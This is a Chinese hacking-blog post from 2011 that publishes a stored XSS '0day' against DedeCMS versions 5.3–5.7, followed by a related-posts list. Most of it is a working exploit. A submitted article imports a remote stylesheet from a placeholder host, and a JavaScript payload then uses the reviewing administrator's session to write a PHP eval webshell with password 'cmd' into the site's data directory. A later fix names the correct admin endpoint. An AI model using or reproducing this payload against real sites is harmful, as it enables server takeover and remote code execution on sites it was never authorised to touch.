DeDecms xss 通杀0day 附getshell EXP

2011, June 26, 8:45 AM. oday收藏
Submitted by admin

作者:haris

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。
条件有3个:
1.开启注册
2.开启投稿

3.管理员很勤劳,会去审核文章,最鸡肋的地方了

注册会员—-发表文章

内容填写:

<style>@im\port’\http://xxx.com/xss.css’;</style>

 

新建XSS.CXX
body{
background-image:url('javascript:document.write("")')
}

 

新建xss.js

内容

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split('/')
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){
var url= "/"+u+"/sys_sql_query.php";
var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);
}

 

 

当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd

 

http://www.3hack.com/page/2

 

t00ls

有同学提出说不成功。刚刚看了下代码,有个地方需要更正一下。

把 sys_sql_query.php 修改成 file_manage_control.php

不存在域的问题。
Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
“幸福百相园”相册GETSHELL漏洞 (浏览: 31754, 评论: 0)
dedecms默认的注册用户 (浏览: 9494, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 9895, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 12853, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 33714, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 18315, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 7896, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 7144, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 14508, 评论: 0)
DedeCms V5.6 注入 0day (浏览: 6954, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):